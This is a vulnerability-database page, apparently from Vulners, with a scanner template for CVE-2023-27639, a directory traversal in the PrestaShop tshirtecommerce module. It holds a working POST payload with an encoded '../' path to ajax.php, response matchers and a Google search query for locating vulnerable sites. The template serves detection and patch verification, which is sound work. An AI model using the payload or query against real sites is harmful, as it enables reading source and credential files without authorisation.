| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2023-27639 | 1 Jun 202321:15 | β | attackerkb | |
| CVE-2023-27639 | 9 Jan 202520:17 | β | circl | |
| PrestaShop θ·―εΎιεζΌζ΄ | 1 Jun 202300:00 | β | cnnvd | |
| CVE-2023-27639 | 1 Jun 202300:00 | β | cve | |
| CVE-2023-27639 | 1 Jun 202300:00 | β | cvelist | |
| CVE-2023-27639 | 1 Jun 202321:15 | β | nvd | |
| Open redirect | 1 Jun 202321:15 | β | prion | |
| PT-2023-21274 Β· Prestashop Β· Tshirtecommerce | 1 Jun 202300:00 | β | ptsecurity | |
| CVE-2023-27639 | 23 May 202503:33 | β | redhatcve | |
| VulnCheck KEV: CVE-2023-27639 | 1 Jun 202300:00 | β | vulncheck_kev |
id: CVE-2023-27639
info:
name: PrestaShop TshirteCommerce - Directory Traversal
author: MaStErChO
severity: high
description: |
The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.
impact: |
Unauthenticated attackers can exploit directory traversal in the Custom Product Designer module to read arbitrary files including source code and configuration files, potentially accessing database credentials and sensitive PrestaShop configuration.
remediation: |
Update the Custom Product Designer (tshirtecommerce) module for PrestaShop to a patched version that validates file paths and prevents directory traversal in ajax.php.
reference:
- https://www.cvedetails.com/cve/CVE-2023-27639/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27639
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-27639
cwe-id: CWE-22
epss-score: 0.03551
epss-percentile: 0.87911
cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 1
vendor: tshirtecommerce
product: custom_product_designer
framework: prestashop
google-query: inurl:"/tshirtecommerce/"
tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"
headers:
Content-Type: application/x-www-form-urlencoded
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php"
matchers-condition: and
matchers:
- type: word
words:
- "SqlFormatter Examples"
- "SqlFormatter"
- "<?php"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502207c99a8d2575e8ee9a30a75a74f81b4ca0c10337079c2b7618e9cef34040aa029022100b469d10b04200bcd2f12e0c3233bdd7b7af426c7d6fe3fbd915ffb6e57dd9299:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation